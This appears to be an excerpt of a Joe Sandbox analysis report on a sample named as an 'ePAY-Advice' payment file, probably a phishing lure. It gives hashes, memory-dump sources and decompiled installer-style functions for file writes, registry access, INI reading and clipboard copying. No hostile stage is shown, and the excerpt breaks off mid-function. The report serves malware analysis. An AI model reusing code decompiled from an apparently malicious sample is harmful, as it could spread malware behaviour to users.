Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction ID: 82daff948be82a3a54a064a8b67bdb156262b24a8193569c828015c470817b44
Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction Fuzzy Hash: AFE0EC3265425AABDF509E559C00BEB7BACEB453A0F008832F915E3190D235F9219BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405BAA Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BAA(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405bae
0x00405bbe
0x00405bc6
0x00000000
0x00405bcd
0x00000000
0x00405bcf

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,00403159,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405BBE

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction ID: 29870a228079f63f45527f16aa4763e95840d14b1a08b3071f6f7043dbe3ced8
Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction Fuzzy Hash: EBE0EC3261429AABDF109F559C00EEB7B6CEB05361F144832FD15E6150E271F8219BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00402340 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402340(char __ebx) {
				char _t7;
				CHAR* _t8;
				CHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x409010; // 0xa
				 *(_t21 + 0xa) = _t7;
				_t8 = E00402ACB(1);
				 *(_t21 - 0x3c) = E00402ACB(0x12);
				GetPrivateProfileStringA(_t8,  *(_t21 - 0x3c), _t21 + 0xa, _t19, 0x3ff, E00402ACB(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402340
0x00402348
0x0040234c
0x0040235c
0x00402373
0x00402379
0x0040173b
0x004026f0
0x004026f7
0x004026f7
0x0040295a
0x00402966

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 5b82fafcaaec8a5acc648c7dfa3e14f41738cacad1081e8147d88725ac003824
Instruction ID: 95cdf8392c9de35cfe821bde4bcbabdc9096ffea94e6ef07c2b1f4e495c6c526
Opcode Fuzzy Hash: 5b82fafcaaec8a5acc648c7dfa3e14f41738cacad1081e8147d88725ac003824
Instruction Fuzzy Hash: 3DE08630E04204BADB10AFA18E0AEAD3678AF41714F14883AF9507B0E1EAB944419B3D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DF0(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405D75(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00405dfa
0x00405e01
0x00405e14
0x00000000
0x00405e14
0x00405e05
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0041F4E8,?,?,00405E7E,0041F4E8,?,?,?,00000002,Call), ref: 00405E14

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction ID: ba5dad521a6b40c9e54b5391ff095803b52aec86cb211a8a265cc86c886d2883
Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction Fuzzy Hash: 2AD0123214460DBBDF115F90EC05FAB371DFB14311F004426FE45A4091D375D670AB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040159D() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402ACB(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015a8
0x004015ae
0x004015b0
0x0040271c
0x0040271c
0x0040295a
0x00402966

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bf46b41dff6bd68abdf24c1f757195172e7ff9030f8e05a8d9bacdb7a8103d7e
Instruction ID: 6b6e43e0d42c625d8266bfea82bd0fe16559fb602912bc7a2e5d3c6a4b8464c0
Opcode Fuzzy Hash: bf46b41dff6bd68abdf24c1f757195172e7ff9030f8e05a8d9bacdb7a8103d7e
Instruction Fuzzy Hash: 4ED012B2704111ABCF10DBE89A489DDB7A49B40329B308537D111F21D0D2B98A45A72E

Uniqueness

Uniqueness Score: -1.00%

Function 0040403E Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040403E(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x423708, 0x28, _a4, 1); // executed
				return _t2;
			}

0x0040404c
0x00404052

APIs

SendMessageA.USER32(00000028,?,00000001,00403E6E), ref: 0040404C

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040318E Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040318E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040319c
0x004031a2

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 0040319C

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Uniqueness

Uniqueness Score: -1.00%

Function 6E161215 Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x6e16405c); // executed
				return _t1;
			}

0x6e16121d
0x6e161223

APIs

GlobalAlloc.KERNELBASE(00000040,6E161233,?,6E1612CF,-6E16404B,6E1611AB,-000000A0), ref: 6E16121D

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 0b46868fee5b146fad66b6a4cb645935df7be7f692934c48d9c5067d65afbcad
Instruction ID: 695732c3280cd29368dd218546245748418765d420ec0051bf8cdf8abc2fdac4
Opcode Fuzzy Hash: 0b46868fee5b146fad66b6a4cb645935df7be7f692934c48d9c5067d65afbcad
Instruction Fuzzy Hash: BBA00271D44910DBDEC59BE08A1EF7C3B21F78A701F00C040E31554194C6758416FB75

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004051CF Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004051CF(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x422ee4; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405163, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405F8C(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x41fd08;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x422ecc - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423708, 8);
							__eflags =  *0x4237ac - _t150;
							if( *0x4237ac == _t150) {
								E00405091( *((intOrPtr*)( *0x41f4e0 + 0x34)), _t150);
							}
							E00403FE2(1);
							goto L25;
						}
						 *0x41f0d8 = 2;
						E00403FE2(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404070(_t157, _a12, _a16);
						}
						ShowWindow( *0x422ed0, _t150);
						ShowWindow(_v8, 8);
						E0040403E(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x423714;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x422ed0 = GetDlgItem(_a4, 0x403);
				 *0x422ec8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x422ee4 = _t128;
				_v8 = _t128;
				E0040403E( *0x422ed0);
				 *0x422ed4 = E0040492F(4);
				 *0x422eec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404009(_a4);
				if(( *0x42371c & 0x00000003) != 0) {
					ShowWindow( *0x422ed0, _t150);
					if(( *0x42371c & 0x00000002) != 0) {
						 *0x422ed0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040403E( *0x422ec8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42371c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x004051d5
0x004051dd
0x004051e0
0x004051e8
0x004051eb
0x0040537a
0x00405380
0x004053a4
0x004053a4
0x004053b0
0x004053b6
0x004053d8
0x004053d8
0x004053de
0x00405433
0x00405433
0x00405436
0x00000000
0x00000000
0x00405438
0x0040543b
0x0040543e
0x00000000
0x00000000
0x00405448
0x0040544e
0x00405450
0x00405453
0x00405550
0x00000000
0x00405550
0x00405462
0x0040546e
0x00405477
0x0040547e
0x00405482
0x00405485
0x0040548e
0x00405494
0x00405497
0x00405497
0x004054a7
0x004054ad
0x004054b0
0x004054bb
0x004054bb
0x004054bc
0x004054bf
0x004054c6
0x004054cd
0x004054d5
0x004054d5
0x004054e3
0x004054e9
0x004054ec
0x004054ec
0x004054f3
0x004054f9
0x00405502
0x00405509
0x00405512
0x00405514
0x00405517
0x00405526
0x00405528
0x0040552b
0x0040552c
0x0040552f
0x00405530
0x00405531
0x00405531
0x00405539
0x00405544
0x0040554a
0x0040554a
0x00000000
0x004054b0
0x004053e0
0x004053e6
0x00405414
0x00405416
0x0040541c
0x00405427
0x00405427
0x0040542e
0x00000000
0x0040542e
0x004053ea
0x004053f4
0x00000000
0x004053b8
0x004053b8
0x004053be
0x004053f9
0x00000000
0x00405400
0x004053c7
0x004053ce
0x004053d3
0x00000000
0x004053d3
0x004053b6
0x004051f1
0x004051f5
0x004051fd
0x00405201
0x00405204
0x00405207
0x0040520a
0x0040520d
0x0040520e
0x0040520f
0x00405228
0x0040522b
0x00405235
0x00405244
0x0040524c
0x00405254
0x00405259
0x0040525c
0x00405268
0x00405271
0x0040527a
0x0040529c
0x004052a2
0x004052b3
0x004052b8
0x004052c6
0x004052d4
0x004052d4
0x004052d9
0x004052e7
0x004052e7
0x004052ec
0x004052ef
0x004052f4
0x00405300
0x00405309
0x00405316
0x00405325
0x00405318
0x0040531d
0x0040531d
0x00405331
0x00405331
0x00405345
0x0040534e
0x00405357
0x00405367
0x00405373
0x00405373
0x00000000

APIs

GetDlgItem.USER32 ref: 0040522E
GetDlgItem.USER32 ref: 0040523D
GetClientRect.USER32 ref: 0040527A
GetSystemMetrics.USER32 ref: 00405281
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052A2
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052B3
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C6
SendMessageA.USER32(?,00001026,00000000,?), ref: 004052D4
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E7
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405309
ShowWindow.USER32(?,00000008), ref: 0040531D
GetDlgItem.USER32 ref: 0040533E
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040534E
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405367
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405373
GetDlgItem.USER32 ref: 0040524C

Part of subcall function 0040403E: SendMessageA.USER32(00000028,?,00000001,00403E6E), ref: 0040404C

GetDlgItem.USER32 ref: 0040538F
CreateThread.KERNEL32 ref: 0040539D
CloseHandle.KERNEL32(00000000), ref: 004053A4
ShowWindow.USER32(00000000), ref: 004053C7
ShowWindow.USER32(?,00000008), ref: 004053CE
ShowWindow.USER32(00000008), ref: 00405414
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405448
CreatePopupMenu.USER32 ref: 00405459
AppendMenuA.USER32 ref: 0040546E
GetWindowRect.USER32 ref: 0040548E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E3
OpenClipboard.USER32(00000000), ref: 004054F3
EmptyClipboard.USER32 ref: 004054F9
GlobalAlloc.KERNEL32(00000042,?), ref: 00405502
GlobalLock.KERNEL32 ref: 0040550C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405520
GlobalUnlock.KERNEL32(00000000), ref: 00405539
SetClipboardData.USER32 ref: 00405544
CloseClipboard.USER32 ref: 0040554A

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: a7c7917210d8113858a77f036c29cce5cc51267a75d042537e7497f926d3728d
Instruction ID: 0e806a1c10c1a3103ec1b6ff030541c572903ae85d70ab094f2e75f2d1af7317
Opcode Fuzzy Hash: a7c7917210d8113858a77f036c29cce5cc51267a75d042537e7497f926d3728d
Instruction Fuzzy Hash: ABA15AB1900209BFDB219FA4DD89AAE7F79FB04355F10403AFA04B62A0C7B55E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040449B Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040449B(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
